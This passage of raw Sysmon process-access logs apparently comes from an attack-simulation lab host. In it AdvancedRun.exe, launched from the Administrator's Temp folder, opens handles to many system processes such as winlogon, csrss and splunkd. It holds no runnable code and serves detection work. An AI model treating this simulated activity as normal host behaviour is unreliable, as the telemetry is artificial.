Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004080486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.e